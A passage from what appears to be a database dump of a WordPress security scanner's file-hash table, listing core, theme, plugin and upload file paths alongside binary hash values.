�s�E����P|��','',0,'?'),('��̭\n5�B����+�l','wp-includes/blocks/gallery/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~ɮ�gMw�|}[��\r','��9��O�D\"��ɩő\'j���zkW��[��}�','',0,'?'),('��J�B�&9:V�F[�','wp-includes/js/dist/media-utils.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��8�asꋪm��Y�','q~Is^�{�[����`j���T�Y����>','',0,'?'),('���C�.yj\0o�*�f�','wp-content/plugins/wordfence/views/scanner/option-scan-signatures.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L\Z3`f��і{_z�q',' .IET��أ��J#�J�Uk�7�hy��\\�0�','',0,'?'),('��w�Y�a�5 ��/','wp-content/plugins/wordpress-seo/admin/views/class-yoast-feature-toggles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�FANa\Z�;fZ&p���~','7m��D-�b�gM>r���\0�!�ܺ(�wk��','',0,'?'),('�!�(t��<Թ','wp-includes/js/heartbeat.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�[�f���:��','c��V��g-�$6�[\"�3i�<�~�w���\"�N','',0,'?'),('��_\r�JL�#�@B��','wp-admin/css/colors/midnight/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\"�;4��3�#�L%','tP01)c���3���,~�h�ܚ�Ox�:���d','',0,'?'),('�ƪ�D��|��\"�3��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('� �I�_X�����?','wp-admin/js/gallery.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�XJ7���jp��8�n�T','+:��U�.��v�fKBUL���+s��h[','',0,'?'),('�4V��s#�,�Q��','wp-includes/blocks/query-pagination/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')��c�i�?\\��$3','5K��ߒAͼ~��;#x�(ĬE�-�-�}���','',0,'?'),('�4��6�1�m��Y�R','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�nH\0�u�}� `����','���R�&�X��d�[��4���9��V�I','',0,'?'),('�<���\0vY�>ma','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-chat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3�=4�+��2]','i\Z%�2���l���@uFi��=��_\0P�հ�','',0,'?'),('�mF�`&��E��4)�','wp-content/uploads/2021/08/building-768815_1920-300x200.jpg',0,'x���Xl������[�','x���Xl������[�',',ڷp����Mw�\Z!�_tZjD�� v�yB�a�','',0,'?'),('�v6^A��A/],6\'y:','wp-admin/css/site-health.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W�*x�\"p��!0+d�','\'�r�O[Fpi_��=��cE�uYN�f1�]','',0,'?'),('ہ�3�<��̧�>�W','wp-content/plugins/wordpress-seo/src/schema-templates/cooking-time.schema.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�\\��:�LƅB�/�','�����P�qщ���z�6�}� �����5�','',0,'?'),('ۆxD��L��zW#řM','wp-content/plugins/wordpress-seo/packages/js/images/icon-facebook.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�pP���x�}��','|�*��Z ��uh@�z;;`F�ÉXCÒ��5m','',0,'?'),('ۋ{S0\0\0=�1_ئ\r�5','wp-includes/js/dist/priority-queue.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ޮP�\\��r�k���H','�\"��?��G^階t������\'����m�C�','',0,'?'),('ۖJ�Bw�C��|M�v','wp-content/plugins/wordfence/lib/Diff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5VzY�]�#yR��Jݮ','Y�M�\"z)tϖ���*c�wL\0�����1w$d��','',0,'?'),('۪�� .�ո�\\���','wp-includes/js/tinymce/skins/wordpress/wp-content.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����`��Un\0\r��','>���@�:so���X�=��Kd��ku�{�','',0,'?'),('۵Ga]?��� ���\r\n�','wp-content/plugins/wordpress-seo/src/deprecated/src/actions/indexation/indexable-complete-indexation-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5&���Z5oN��','~U�/1d6�e�A[)ye�F�Zᑉ��Q���v','',0,'?'),('��r�����=�Ԓ�','wp-includes/images/rss.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[�(�.��*NZ�','j�(-9��_��E-#�we�$�]o�01��u','',0,'?'),('�ڨ�t�c �˵�:G�','wp-content/themes/twentytwenty/template-parts/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',(��A�)f�O�|','o���]��̀�h\"����xd���HM\\�j�','',0,'?'),('��\np���Gnu:���','wp-includes/js/colorpicker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V g�����-�','�V�w��%�%�:�3CQ#+g�� ��e�}�','',0,'?'),('��:�ҝ\Zdm���*v','wp-content/plugins/wp-cerber/assets/flags/ie.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�Ht�`��Mˉ.2*','��H�X�� �\Z�۴�n��\0y��n��n','',0,'?'),('��$�\r�暡\0*�','wp-content/uploads/2016/11/retro-3249927_960_720-300x250.jpg',0,'�M�E}�@鸳R6aʴ','�M�E}�@鸳R6aʴ',':��l6f�*��)�f��9�IngES��?�Y�G�','',0,'?'),('�F���\ru�D�b7','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-segmented.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��m�E���}8ןb�,','dh��nC���[�$���P7�xH\"8�i\Z*�','',0,'?'),('�ȼ�؟�\'\r`����','wp-includes/feed-rdf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xG�7�%���\0b���','p=m=G�l�h�nh��V��]�-�+�1�a','',0,'?'),('��<*���(�[C��','wp-content/plugins/wordpress-seo/src/deprecated/src/conditionals/norwegian-readability-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?��.1�������','�\r��� ��.+�0��MǧV`U�T{\n���b�','',0,'?'),('����ǖ����o','wp-content/plugins/wordpress-seo/src/integrations/front-end/redirects.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��sf,��Pҵ�<`','ط�&�\Z\rq\n�z�3��J�0��9è�3�','',0,'?'),('� ��\'����\'���','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Exception/ServerException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� �7�@� �l��','�ClMސ�\'�a�\n�� �/�W�0���n�','',0,'?'),('�-��z_BO\rv�F�6','wp-content/uploads/2019/09/garden-1680802_960_720-300x199.jpg',0,'<��J�W��EX�k��','<��J�W��EX�k��','h!\0��-�5�?s�0��3v���Gsg��nr��r','',0,'?'),('�1�<(��JSu��','wp-content/uploads/2016/11/wood-fibre-boards-2928524_960_720-updraft-pre-smush-original.jpg',0,'�$OD\"�-�T��k��','�$OD\"�-�T��k��','��0m��Nm��\\�|�\0i�/o���3@�{','',0,'?'),('�2G�?�_�\\��-B','wp-includes/canonical.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��G��o<����ݏ�','����1\r�eɓ�������Y宒^zՒ=�F�1','',0,'?'),('�7�40���!Go �','wp-content/themes/twentynineteen/sass/elements/_elements.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S��u����$x\0oT�','�\n�ơ�J��xY#$m>�ۍյ?�U\"$��lz','',0,'?'),('�>��n*p[F��B:��','wp-content/plugins/wordpress-seo/admin/statistics/class-statistics-service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z��`7l4p��C7','�@���\n�V��l0���菋W=٠��;','',0,'?'),('�M\\-D�kf����','wp-content/plugins/wp-cerber/assets/flags/kw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H�p8V��$vL\r�Y]�','&�\\m0���Iz{<�>��|���\'����L','',0,'?'),('�V2~<��>M9��%�','wp-content/plugins/wordpress-seo/js/dist/bulk-editor-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[����o�)܍����','�R��M�:\0����XV¾�\'6)\0W�$��','',0,'?'),('�y�b1��j�źw�','wp-content/plugins/wordpress-seo/languages/wordpress-seo-es_PE.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p\"�[�7���2�','��(^e鞠�rE��6E�r��u�n�e��','',0,'?'),('ܑK�ݓ���%eP�^U','wp-content/plugins/wordfence/views/scanner/issue-checkGSB.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�}�h�k9�yb�(W','���\ZD��Q�^��\\�����9��;�7v��F�','',0,'?'),('ܲI�: ��oЪ�\"�','wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-homeurl-watcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6��qH��jz�`�','#p}Α��Z�c֕nM.�9�\r���.2�m','',0,'?'),('���.�U� ��Y��=','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/byte_safe_strings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h���`����V�Af','<�\\�G��;1#��k�L��à��(փ','',0,'?'),('��Tо�R���\'�{','wp-content/plugins/wordfence/lib/wfPersistenceController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%��ky���i�MO*','����X(�30\r\n��\nPE�̠�� �9��','',0,'?'),('�诛���<�eO`&5','wp-content/uploads/2019/08/rent-300x200.jpg',0,'�Na�=��^���܆�','�Na�=��^���܆�','\\I�����뿒��^e�RN\ngAOa];�','',0,'?'),('��ջZml��4�ˮU','wp-includes/images/smilies/simple-smile.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K��{
��f�w�h','�?Y�ag\\�<y����0\01��8�3��H�g','',0,'?'),('��0���\Z/1��~','wp-includes/blocks/query-pagination/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+���N(�eI�lw��','s8Zf��V��&dc�ٽa)��l�r��','',0,'?'),('��\r\0FJ��B��e�','wp-login.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:�p���ęo#��',',�A�m�C[.MdD\r+��eJ�k��','',0,'?'),('�(���K�B��','wp-includes/js/codemirror/fakejshint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�v�,ROlx]J\')K','��-�6�$$�;���}ptO�4]2��ТR�5֡','',0,'?'),('��Ԭg#��٠���','wp-content/themes/twentytwentyone/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n��6Z��.�C�A','��-c����W��o��6\n����(','',0,'?'),('�#�&�ݼV��!͘��','wp-content/uploads/2016/11/kitchen-2165756_960_720-updraft-pre-smush-original.jpg',0,'_M�v���h�7-�b�C','_M�v���h�7-�b�C','�}��1W��O�X���E@���*#4�8dl�','',0,'?'),('�J0���j�Yg�h�','wp-includes/js/tinymce/plugins/lists/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�8��:s��w�9�J��',')b�#4�e��*�9(��=�QE�e0|1���\n�','',0,'?'),('�U�BA��b��-r�hM�','wp-content/plugins/wordpress-seo/js/dist/externals/redux-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��s,�C��\n� �s�','ل�r:g\"~|��߷��E��v2|>�� �ʿL','',0,'?'),('�[6�5��+� �n9�','wp-admin/images/sort.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������*� ����3','vP���-~�x��O\" �����;��','',0,'?'),('�`��L\\3-i�_3�S\r�','wp-includes/blocks/code/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����(�궲zhɶ',' ���6�r3����C9a�ْ�~ȝ���:�','',0,'?'),('�b��qG���]:̃R','wp-content/uploads/2019/09/gardening-300x250.jpg',0,'��ټ�x�%;�Y�Z','��ټ�x�%;�Y�Z','N-Ȳ���7Z����P�<�:�Av�!͚=]n��','',0,'?'),('�f��y���ħ�*!','wp-admin/js/nav-menu.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3_[��2W�/4R��\Z','WU�!)�=�Eο5偬�bnd�}l,����','',0,'?'),('�h�Ea����Vq� g','wp-content/plugins/wordpress-seo/admin/import/class-import-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ç\n!Вז�9���?:','���;���l�?q��\"�:�������','',0,'?'),('�r~BX;��ß�','wp-content/uploads/2019/06/fibre-optic-300x200.jpg',0,'~%��z�|ǨXrݳ@z','~%��z�|ǨXrݳ@z','#Ac���5�?�m&-��.�ӱ>F^W=S���U#','',0,'?'),('�~V�5VU�60v�bG','wp-content/plugins/redirection/locale/redirection-nl_NL.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*��^�Cr�\Z��,F�H','�;U7�|�d�?~��$aV/��cb�����=�','',0,'?'),('݀������d`ү��','wp-content/plugins/wordpress-seo/vendor/yoast/i18n-module/CHANGELOG.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"XZ:a��e\r4�','�^2i�L�ɥ@d�`��y�eN��[&K�h\'�@','',0,'?'),('ݖ�\'�\"|3�_�t|��','wp-includes/class-wp-term.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Q5��ׄXZ��','�}Gj)p�����O�7�٠fݒ���ፎ�Y�p','',0,'?'),('ݛRtq�~~dT}F��','wp-content/languages/plugins/wordpress-seo-en_GB-a2af609aea549366eaa3b7de6cbafd8b.json',0,'XCu43�R~�(��','XCu43�R~�(��','�_����!!�Xd@�.��\"�����a�ј�$','',0,'?'),('ݦ����{b�h0�Q�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/rss/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6ߔu�U�Q(�AF�','̩\ZTQb[c�U�,��s~��$�F_\n�e� �','',0,'?'),('ݺ�������\"��$4�','wp-content/plugins/wordpress-seo/languages/wordpress-seo-nb_NO.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f\Z\"n���1\\��zF�','Tҫ#�ڑ^-���U�<waAXa��8�%��-','',0,'?'),('ݿQ0��\'FO?�(�','wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/class-schema-person.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\"<���@:��O��','B�bS�\n�ʑ.��Y��\nf5>�i]','',0,'?'),('�����\Z4=#��','wp-content/themes/twentytwentyone/.stylelintignore',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':F��Q��K/���(�','�\"����$ْ��Mh�m��6�:W�C�tN��`�','',0,'?'),('���4�����','wp-includes/blocks/media-text/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�B��25U�ИN�B�','@��e!��Eϑp\ZX��;�TSb���,z�','',0,'?'),('�ӟ���j/pO\\)�?�H','wp-content/plugins/wp-cerber/languages/wp-cerber-uk.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��b�s.Ju37#g�}',' l���_7���DL�pb�Uy��=5�9��/��','',0,'?'),('��X|��\n4�� ','wp-content/uploads/2019/09/tree-surgeon-150x150.jpg',0,'���|����\0 ','���|����\0 ','=�@�?�a�(&\n���f��W�����O�Z','',0,'?'),('��\'��|?��>��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���L��aDJ�?��Z��','����=F=�=�<��_%�=��M?�����u/','',0,'?'),('�OKN�\0�Yn\"��a','wp-content/plugins/akismet/views/connect-jp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��s��Q�X���3��','�\0.l>Wv&�������q�v�+��I�N~�W','',0,'?'),('�HC������)�C�','wp-content/plugins/wordfence/lib/rest-api/wfRESTBaseController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y��K��\n�u�@�x','Aݶ�݁;_|s�Ȥ4��_�)z�aK�Q�Ee!��','',0,'?'),('��u�m�mL�jsL/�','wp-content/plugins/wp-cerber/cerber-ripe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z�a���G�5.L��','�BA�i���B�\rD�y.��_�Ώ%)�X�h�\Z�','',0,'?'),('�p�խ^�@#�Ԓ','wp-content/plugins/wordfence/views/scanner/scan-progress.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�1{� @�m�90','�K��M$���)�+SCQF�1qZ�Tv`�r','',0,'?'),('�3^��PM�Y���H�D�','wp-includes/js/tinymce/skins/wordpress/images/video.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�¶��B�=\rz��3j�','���i���I/=�M�MX�:M�A�pv�\r�','',0,'?'),('�5f�����oޮ�','wp-admin/includes/class-wp-privacy-policy-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ã��6�rRӆ��',':����֎�,J-1�3��B\ZU.��g','',0,'?'),('�:�����%��ze2','wp-content/plugins/wordpress-seo/vendor_prefixed/psr/http-message/src/ServerRequestInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�Vlo%�Ր��]�\n','7�]��wE\'���5G.�)����\n��+� ��z','',0,'?'),('�N�\\�|�`*�,)@4','wp-includes/images/xit-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ӂ�u:@4\r���z<5�','�S\r�}@�~Q�:�Sc����*d+�Z�_�{�R','',0,'?'),('�Q��\\����E��','wp-content/plugins/wordpress-seo/admin/endpoints/class-endpoint-file-size.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�B��c��#����V','-a4n�!�.�E7��w\\�5@�t�\0;��4�x� ','',0,'?'),('�\\�%6J���h��@�','wp-content/plugins/wp-cerber/assets/fonts/roboto/Roboto-Mono_400.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���=����^.\0\Z�Q','Nv����EF_�[�*�G�U��Bĉ��Y�','',0,'?'),('�a�c]OVT�;� (K','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-blacklist-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Nb�[�c�^��2}/��','��g\r�^� �j��L��v2���\Z���x�t','',0,'?'),('�|�p����#}��ID','wp-content/plugins/redirection/models/url/url-transform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�8�;�ulGg��h�','���1�\\�E�|{n/P�͙F,���7ļZ���U','',0,'?'),('ޒ�?I�Ωi%��g�y�','wp-content/plugins/wordfence/lib/menu_dashboard_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A��~��Ԕ�T��vq','�9��FfW�rO�;�L��j�e�2��_�','',0,'?'),('ޚ�ꧭ�߅\"gс<Nr','wp-includes/blocks/text-columns/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���w��`}�N�\n��X','�t!��l�`�|*�^���0� �l$C���;��','',0,'?'),('ޠ�OČÑL:\0و�','wp-content/themes/twentytwenty/assets/images/2020-three-quarters-4.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ӂ��\"�E47ŎE�','�����yaĊ��2ݦ�wʩ��q�,���{','',0,'?'),('ޠ�q����D���b,','wp-includes/blocks/paragraph/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�o5Ё@��|pp���','$�O�6��p�簙g<EBJ�Tս~i,�����','',0,'?'),('ު�%���%-������','wp-content/plugins/wordpress-seo/images/alert-info-icon.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B,���I���k�E0�','�f��/�#O4���۵Q�svv�+���&�#�','',0,'?'),('��à��j�F4���','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/UriTemplate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���9w�l�;�+��H�','�pk��\r<�wB�\"a�����6��W�u�v`','',0,'?'),('��z���<2������','wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-success-message.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�mt�^.�;�n�=\Z','uI�X`&i�nF�1�U�,_\\�vH�\0S�\0=','',0,'?'),('�ދ���1F���a�','wp-content/plugins/wordfence/lib/wfArray.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'Fbaۆ�ₑ�1ʤ/','��n2q��8D��-�AR�>�xqYq���$� ш','',0,'?'),('��\'g!�:�H��),�','wp-includes/SimplePie/XML/Declaration/Parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O,@�ۺ�a� Δ��','��im�Q�q+��\r��:�Po����\Z*�����','',0,'?'),('�CZ[}�\"\r�j�4�','wp-includes/js/dist/vendor/regenerator-runtime.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:�w�\Z&�U-�','�½6b��^�\0������f��ے\n?h�','',0,'?'),('�\nk�Y����ul����','wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-section-additional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#� �Y�l�� Z1��','��#�k/�ʰ�aw��E*;v����[#��','',0,'?'),('�p���́i��<%','wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.1629122067.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lY�Z�iਆ�3\02[','(��A#��F���~+���Fgh��S�.�b','',0,'?'),('�u���J���,Fq�','wp-content/plugins/wordpress-seo/inc/exceptions/class-myyoast-invalid-json-exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{��\0,��\'���gUƉ�','TtJ��5i>x�u��H��f{�|�kG��X','',0,'?'),('���\"�����c)j�\"','wp-includes/js/wplink.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\r��X��|\0LF��','��K�f��\Z���AU�i�/��\n$�H5*��','',0,'?'),('�/��i�Zج �[?�*�','wp-content/plugins/wp-cerber/assets/multi/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u���E.0�Ȁ��b[�','�]=2�����F���(Cҷ\Zc�93Є�K@','',0,'?'),('�=@\\�JpQ�m\\��6','wp-admin/includes/class-wp-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M$=�8�:����Az�n','%L���ð�@C�Ub��t�����n���c\Z�d','',0,'?'),('�=����>\0�U<�n�','wp-admin/images/about-header-freedoms.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��tM9~�߲f���+','��a��E�Vb��Ug��v�<�Rv�,vwM���','',0,'?'),('�L#�����a���W �','wp-includes/rest-api/endpoints/class-wp-rest-revisions-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h8��\n��e�','X�y(:Չ֨Ә����o�Zty�Ɯ�_��\'','',0,'?'),('�bz�/���T�7aHy','wp-includes/js/mediaelement/mejs-controls.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^yq+�S%��y','������h���A3L�:��\'1�ꁠ�\\�','',0,'?'),('�j���X��&=��','wp-content/plugins/wp-cerber/languages/wp-cerber-zh_CN.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��N�=��a\0H�k','���z\n����K�I!�W?�ߤl�Uz$','',0,'?'),('�q����%ű� m+','wp-admin/css/colors/light/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7���3��-S�','9�Z�(�\"�Na\'��S�f{uK�#W�����','',0,'?'),('�r�±�2�\"}� �,�7','wp-content/plugins/wp-cerber/assets/flags/nl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��K��+Z59����)|','/��\ns��!�-���?k���>��yU� �','',0,'?'),('�z#�>�l��R���f','wp-content/plugins/wordpress-seo/src/presenters/rel-prev-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[��d�B��]��L�','���x5�vF4�J�%���q��7kڱq[5','',0,'?'),('ߌ��(������2���','wp-includes/js/quicktags.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���O�@{��Π(�n','��&K� ;�h�R����&ʱ8o�v>X�','',0,'?'),('ߔ������H�u�&�','wp-includes/js/plupload/plupload.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݠ�$pZR�>\'�|�','�\"����8[J%�.�˚�c�V\r\rE��)\'','',0,'?'),('ߗ�Q��u�!ٶx�[','wp-includes/js/wpdialog.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=nR�-��KP��=��<','w���ڇEÞ����\0�v�ӭ��k^�M�n','',0,'?'),('ߘ����}�4�S\rc�','wp-content/uploads/2019/06/fibre-optic-300x250.jpg',0,'�\r̶&�h�٬\0��\Z','�\r̶&�h�٬\0��\Z','���C�����R�1�� �V\"P�UT�{','',0,'?'),('߫?��|�~��q9J���','wp-content/plugins/wordpress-seo/src/deprecated/src/integrations/admin/indexation-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S��i��,Ry&ְiH','�{�__G�ݵo��@��9�s�3��@��ҫ','',0,'?'),('߰S����h[�۳�','wp-includes/class-wp-http-streams.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Oo�֪$N�~�F0�ۂ','��d� *ȩ�X���J�z9<��)�>�ԃtj','',0,'?'),('ߴ�S8��AТ','wp-includes/js/jquery/ui/autocomplete.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':dL�*�E�&*!','��`��Or\r�8;P[Q�=�;����ܣj','',0,'?'),('߹V�=���\"�#n� �','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/lexer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�-�T�\0�2�L-�','�ȴ����g�A�]�z-ۣ��᷸[�','',0,'?'),('��XG�#1�h�2-s5b�','wp-content/themes/vega/includes/wp_bootstrap_navwalker.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C��k���cr�','�>XFz�#���7�) �mᘭ^}�1r\'e�','',0,'?'),('�ĵ>��#B��b���','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ۓ���G�c,��=c^�','�����G�c����t(5\n,9%�����)�e','',0,'?'),('�Ȧ0� $�7O>���','wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ��`%���{~|H�W2','�ЃJ@�Y��־[�L7Q�OX����wt�o','',0,'?'),('��g���hp��BJi4\n','wp-includes/blocks/heading/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����y��<�(�Ę�','�\rU���tJ�`�g04 n��՞F�LZ���','',0,'?'),('��G]��9���e7��(','wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-posts/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>�a�7:ל{�Z��h','\"[3[�@\'��`$Ip�E.ҹS�{���\"$0','',0,'?'),('��Yv�z�֗*�9��a','wp-includes/js/jquery/ui/tooltip.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&�<Q�1}�������','�M@�jM�m��\\����`T@�.���Rl.��','',0,'?'),('��A��S: ���)27','wp-content/uploads/2019/08/thai-property-768x426.jpg',0,'�#�xҦ���TJm��','�#�xҦ���TJm��','մ����2p�4��oT��.�[ 2[���','',0,'?'),('��]�?�t�(`��85V','wp-content/plugins/wordpress-seo/src/generators/schema/main-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N��n�-H[�7Pz','��W��$�2��+*����p\0_�l�]Q','',0,'?'),('��$dp���C����','wp-content/themes/twentytwentyone/assets/sass/05-blocks/blocks-editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��w�2�\'�ud}���','ƵIg\"ʧ[ r���8pVg�R��~��(��)�','',0,'?'),('��eş+�\r�� 